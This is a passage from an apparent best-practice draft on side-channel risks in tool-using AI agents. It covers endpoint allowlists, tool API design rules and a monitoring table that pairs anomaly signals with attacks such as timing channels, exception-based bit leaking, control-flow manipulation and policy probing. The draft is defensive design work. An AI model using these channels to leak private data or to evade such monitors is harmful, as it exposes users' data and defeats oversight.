**Recommendation: Where feasible, make tool call patterns independent of private data.**
|
||||
|
||||
- Avoid data-dependent loops that make external calls
|
||||
- Use batch operations instead of per-item calls
|
||||
- Pad tool call sequences to fixed lengths for sensitive operations
|
||||
|
||||
### 4.4 External Request Restrictions
|
||||
|
||||
**Recommendation: Restrict which external endpoints agents can contact.**
|
||||
|
||||
- Allowlist approved external domains
|
||||
- Proxy all external requests through a controlled gateway
|
||||
- Rate-limit external requests per agent session
|
||||
- Log all external requests for anomaly detection
|
||||
|
||||
## 5. Tool API Design Guidelines
|
||||
|
||||
Tool developers SHOULD design APIs that minimize side-channel exposure:
|
||||
|
||||
### 5.1 Do
|
||||
|
||||
- Return consistent response structures regardless of input
|
||||
- Use fixed-size responses where possible
|
||||
- Include provenance metadata in all outputs
|
||||
- Document trust levels of output fields (which are public, which are private)
|
||||
|
||||
### 5.2 Don't
|
||||
|
||||
- Return variable-length arrays that depend on private data in observable ways
|
||||
- Include internal identifiers in error messages
|
||||
- Use response timing that depends on input sensitivity
|
||||
- Expose iteration counts or batch sizes in responses
|
||||
|
||||
### 5.3 Tool Capability Annotations
|
||||
|
||||
Tools SHOULD declare their side-channel properties:
|
||||
|
||||
```json
|
||||
{
|
||||
"tool:name": "send_email",
|
||||
"tool:side_channel_properties": {
|
||||
"makes_external_requests": true,
|
||||
"timing_dependent": false,
|
||||
"error_messages_may_leak": true,
|
||||
"observable_by_third_parties": true
|
||||
},
|
||||
"tool:recommended_mode": "STRICT"
|
||||
}
|
||||
```
|
||||
|
||||
## 6. Monitoring Patterns
|
||||
|
||||
### 6.1 Anomaly Detection Signals
|
||||
|
||||
| Signal | Potential Attack | Action |
|
||||
|--------|-----------------|--------|
|
||||
| Repeated requests to same external URL | External resource inference | Rate limit + alert |
|
||||
| Unusually high exception rate | Exception-based bit leaking | Halt + review |
|
||||
| Execution time variance > threshold | Timing side-channel | Log + investigate |
|
||||
| Tool call patterns differ from plan | Control flow manipulation | Emergency halt |
|
||||
| Same agent repeatedly hitting policy denials | Probing attack | Throttle + alert |
|
||||
|
||||
### 6.2 Monitoring Architecture
|
||||
|
||||
```
|
||||
Agent Execution
|
||||
│
|
||||
├──► Side-Channel Monitor
|
||||
│ ├── Request pattern analyzer
|
||||
│ ├── Exception rate tracker
|
||||
│ ├── Timing variance detector
|
||||
│ └── Tool call pattern validator
|
||||
│ │
|
||||
│ ▼
|
||||
│ Alert / Halt Decision
|
||||
│
|
||||
▼
|
||||
Normal execution continues (if no anomaly)
|
||||
```
|
||||
|
||||
## 7. Relationship to Other Drafts
|
||||
|
||||
| Draft | Side-Channel Relevance |
|
||||
|-------|----------------------|
|
||||
| Draft 1 (Capabilities) | Capability metadata enables policy checks that detect side channels |
|
||||
| Draft 2 (Flow Integrity) | STRICT mode DFG tracking is the primary side-channel mitigation |
|
||||
| Draft 3 (Provenance) | Provenance metadata itself can be a side channel — needs protection |
|
||||
| Draft 4 (Policy Federation) | Policy denial patterns across organizations can leak info |
|
||||
| Draft 5 (Execution Model) | Isolation architecture is the first line of defense |
|
||||
|
||||
## 8. Security Considerations
|
||||
|
||||
This entire document is about security. Key meta-considerations:
|
||||
|
||||
- Side-channel mitigation is **defense in depth** — no single measure eliminates all channels
|
||||
- The trade-off between security and utility is fundamental — complete side-channel elimination would make agents unusable
|
||||
- New side channels will be discovered as agent systems evolve — this BCP should be updated regularly
|
||||
- Side-channel monitoring itself can create privacy issues (logging all agent interactions)
|
||||
|
||||
## 9. Open Questions
|
||||
|
||||
1. **Formal analysis**: can we formally prove bounds on information leakage for a given agent configuration?
|
||||
2. **Adaptive adversaries**: as mitigations are deployed, attackers will find new channels. How to stay ahead?
|
||||
3. **Overhead budget**: what is the acceptable performance overhead for side-channel mitigation?
|
||||
4. **Multi-agent amplification**: do side channels in multi-agent systems compose (leak more than single-agent)?
|
||||
|
||||
## 10. References
|
||||
|
||||
- Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
|
||||
- Anderson, Stajano, Lee. "Security policies." Advances in Computers, 2002.
|
||||
- Glukhov et al. "Breach By A Thousand Leaks: Unsafe Information Leakage in 'Safe' AI Responses." ICLR, 2025.
|
||||
- Carlini & Wagner. "ROP is still dangerous: Breaking modern defenses." USENIX Security 14, 2014.
|
||||
Reference in New Issue
Block a user